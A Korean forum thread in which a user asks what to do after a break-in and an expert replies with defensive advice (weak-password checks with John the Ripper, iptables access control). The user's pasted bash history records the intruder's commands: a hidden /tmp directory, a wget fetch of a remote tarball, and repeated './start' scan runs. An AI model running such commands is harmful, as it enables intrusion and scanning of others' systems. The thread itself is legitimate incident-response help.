해킹 당한 듯 합니다...

안녕하십니까? 오늘과내일의 홍석범입니다.

해당 계정의 쉬운 암호사용을 이용하여 로그인후 외부스캔을 한 것으로 보입니다.
일단 시스템내에 쉬운 암호를 사용하는 계정은 없는지 John the ripper을 이용하여 점검해 보시고 아울러 iptables 방화벽을 이용하여 외부에서의 접근통제를 엄격하게 설정하시기 바랍니다.

감사합니다.

도와주세요 님의 글

누군가가 해킹을 시도 한 것 같은데..

이럴땐 어떻게 해야 하죠?

일단... 계정삭제 하고 만들어진 파일들을

삭제하긴 했는데...

아래는 접속했던 계정 bash_history 내용입니다.

]# cat .bash_history
uname
uptime
w
passwd
cd /tmp
ls -a
mkdir .a
cd .a
wget www.parazit.eu/p/neo.tgz
tar zxvf neo.tgz
cd neo
./start 82
./start 219
./start 126
./start 127
./start 128
cd /var/tmp
ls
ls -a
cd /var/spool/samba/.a
cd /var/spool/samba
ls -a
cd /tmp
ls -a
cd .a
ls
cd neo
ls
./start 131